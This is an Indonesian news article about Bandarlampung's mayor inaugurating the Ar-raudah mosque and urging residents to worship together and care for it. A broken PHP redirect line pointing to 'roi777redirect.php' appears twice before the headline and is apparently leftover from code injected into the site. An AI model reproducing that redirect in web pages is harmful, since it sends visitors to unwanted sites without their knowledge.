header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Walikota Bandarlampung Resmikan Masjid Ar-raudah -
Walikota Bandarlampung Resmikan Masjid Ar-raudah

TRANSLAMPUNG.COM, BANDARLAMPUNG – Walikota Bandarlampung Herman HN kembali meresmikan masjid beronamen Lampung, Senin (9/7). Kali ini yqng diresmikan Masjid Ar-raudah terletak di Jalan Teuku Umar Gang Suci, Kelurahan Kedaton, Kecamatan Kedaton.

Menurut Herman HN, dibangunnya masjid beronamen Lampung ini untuk memenuhi kebutuhan masyarakat setempat untuk beribadah.

“Selain itu, sebagai upaya kita memelihara, menjaga dan melestarikan nilai-nilai budaya yang memiliki ciri khas adat budaya daerah Lampung yang harus kita lestarikan,” ujarnya.

Orang nomor satu di Kota Tapis Berseri ini juga berharap dengan kehadiran masjid berornamen Lampung ini, dapat mendorong masyarakat setempat untuk memakmurkan masjid dengan rajin beribadah.

“Kalau biasa shalat di rumah, dengan adanya masjid ini, shalat lebih baik dilakukan secara berjamaah,” kata dia.

Herman HN juga meminta kepada pengurus Masjid Ar-raudah untuk menjaga dan memelihara kebersihan dan keasrian masjid.

“Tidak hanya pengurus, seluruh masyarakat disini juga harus ikut bersama-sama menjaga dan memelihara masjid ini, agar kita semua merasa nyaman dalam menjalankan ibadah,” tambahnya.

“Semoga dengan kehadiran masjid ini, dapat menciptakan kedamaian dan makin mempererat tali persaudaraan antar masyarakat,” pungkasnya. (jef/hkw)

News Reporter